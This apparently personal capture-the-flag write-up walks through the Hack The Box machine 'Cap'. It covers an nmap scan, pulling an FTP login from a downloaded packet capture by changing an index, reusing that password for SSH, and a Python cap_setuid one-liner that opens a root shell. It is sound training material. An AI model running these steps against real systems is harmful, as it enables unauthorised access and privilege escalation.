HTB: Cap Writeup

There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!

---

Enumeration

I began searching this box with a standard nmap scan:

$ sudo nmap -sC -sV -oA nmap/cap 10.129.121.64
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 21:26 EDT
Nmap scan report for 10.129.121.64
Host is up (0.091s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.21 seconds

Foothold

From the above scan, there are ports 21, 22, and 80 open, with port 80 hosting an HTTP server. Visiting port 80 in a web browser has a web UI which shows various statistics about the web server, including allowing you to download the last 5 minutes of network traffic.

Looking at the download from this, it can be seen that the download starts at index 1, simply adjusting the download back by an index will give you a PCAP dump at index 0. When viewing this PCAP dump, it may be seen that it’s a recording of an FTP connection with the credentials nathan:Buck3tH4TF0RM3!.

Those credentials work to log into the FTP server on the machine, which starts in the nome directory for nathan. If you attempt the same FTP credentials via SSH, you’ll see that the nathan user has the exact same username/password.

Privesc

Once logged into SSH, the privesc portion took me a bit, but you can eventually find that the executable /usr/bin/python3.8 has the cap_setuid capabilities!

$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

What this means is that the python3.8 executable has the ability to set the UID of the process, allowing it to run as a different user. You may read more about Linux Privilege Escalation using Capabilities.

Using the command /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' will instantly spawn a root shell.